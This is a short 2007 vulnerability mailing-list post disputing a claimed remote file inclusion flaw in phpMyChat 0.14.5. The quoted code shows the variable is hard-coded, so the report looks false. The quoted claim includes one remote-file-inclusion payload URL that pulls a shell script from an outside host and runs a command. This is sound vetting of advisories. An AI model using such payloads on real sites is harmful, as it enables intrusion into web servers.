[VIM] false: phpMyChat-0.14.5
Steven M. Christey
coley at linus.mitre.org
Mon Apr 16 01:26:12 UTC 2007
Wow, that's some of the strongest evidence of "grep and gripe" I've seen
yet. Ouch.
Assuming that PHP doesn't treat "{}" as valid variable characters... ya
never really know with that language.
On Sun, 15 Apr 2007, GM darkfig wrote:
> Link: http://www.securityfocus.com/archive/1/465741/30/0/threaded
> Author: k4rtal[at]gmail[dot]com
>
> Quote from the thread:
> "exploit : phpMyChat.php3?{ChatPath}=http://shelladresin.com/shell.txt?cmd=id"
>
> phpMyChat.php3:
> $ChatPath = "chat/";
> require("./${ChatPath}lib/index.lib.php3");
>
More information about the VIM
mailing list